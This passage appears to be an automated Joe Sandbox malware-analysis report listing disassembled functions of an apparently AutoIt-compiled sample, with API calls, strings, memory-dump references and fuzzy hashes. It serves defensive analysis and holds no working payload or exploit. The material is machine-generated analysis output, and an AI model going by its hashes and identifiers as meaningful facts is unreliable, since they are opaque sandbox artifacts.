                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 006D924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: c5de01d0a2caee534f4c139f5f139a3c1e4174aac24eba8defca8b942e732017
                    • Instruction ID: 88be6625644f2fa1f49f4442f251344e964f71cd4219e4973905fba80aab7ae8
                    • Opcode Fuzzy Hash: c5de01d0a2caee534f4c139f5f139a3c1e4174aac24eba8defca8b942e732017
                    • Instruction Fuzzy Hash: 79018475E41208BBCB58FBA0C992DFF73AA9F15700F24011ABA12673C2EA159F189675
                    Function 006D9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 006D92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 6916343d7bf148133d00cb2b859111871e03c276c2968d4942d46fe78da7d12b
                    • Instruction ID: 6c600166485450a3bd75fae8c6eb039aa7e986cb562f3a9db6d0bc4bb41e9a46
                    • Opcode Fuzzy Hash: 6916343d7bf148133d00cb2b859111871e03c276c2968d4942d46fe78da7d12b
                    • Instruction Fuzzy Hash: 8B01A771E41204B7DB14FAA4C982DFF77AE9F11700F24021AB912633C2DB259F089275
                    Function 006A6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: @Rt
                    • API String ID: 3494438863-1346297377
                    • Opcode ID: f238e8f7228eeca4961dec8d2a2cdb62824d0dfee186e48ce8b926095656c8cf
                    • Instruction ID: 5191442912b9a56d4f3fb797df8ae177136b6ca0cf0ef247ef2aa46d2ec76567
                    • Opcode Fuzzy Hash: f238e8f7228eeca4961dec8d2a2cdb62824d0dfee186e48ce8b926095656c8cf
                    • Instruction Fuzzy Hash: A5F0A475348716ABF764BB28FD016912796FB03364F14402BF200CB291EB788C414A59
                    Function 006E51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 7b7539e976bbe9835d71b0aa6da1172bcba376391c917714eec669e4ff93d096
                    • Instruction ID: d2391fbe1692fc9dec28112c6520809b4fd1d1382904d907ca6d264f4adee46e
                    • Opcode Fuzzy Hash: 7b7539e976bbe9835d71b0aa6da1172bcba376391c917714eec669e4ff93d096
                    • Instruction Fuzzy Hash: 24E0617390032C2BE720AA959C05F97F7ACEB41731F00015BFD10D3140E6649A448BD5
                    Function 006D81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006D81CA
                      • Part of subcall function 006A3598: _doexit.LIBCMT ref: 006A35A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 3e9b4698c95a2266137b3f66d38a0062db9c7b66f4ecee00600fa0c41e7f8e36
                    • Instruction ID: 98676125ae88f2d7cb73fc2fa9111c4c57f667121f207e1865a36d74db477584
                    • Opcode Fuzzy Hash: 3e9b4698c95a2266137b3f66d38a0062db9c7b66f4ecee00600fa0c41e7f8e36
                    • Instruction Fuzzy Hash: FBD05B723C536936D25537A86C0BFC675494B16B51F00401AFB085A6D38DD699D142ED
                    Function 006BB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006BB564: _memset.LIBCMT ref: 006BB571
                      • Part of subcall function 006A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006BB540,?,?,?,0068100A), ref: 006A0B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,0068100A), ref: 006BB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0068100A), ref: 006BB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006BB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 1ca2d510e1cb51f1e05589e36f48e6d958e1fcace4ec63401114b30e2ad7ea9d
                    • Instruction ID: 79b02d071783b53a3a10a0181153c8466521dd00c5de0c92c0b68e45b11684c5
                    • Opcode Fuzzy Hash: 1ca2d510e1cb51f1e05589e36f48e6d958e1fcace4ec63401114b30e2ad7ea9d
                    • Instruction Fuzzy Hash: B7E06DB16003118FD370EF28E5083827BE0AF00714F008A2DE446C2651DBF8E848CB66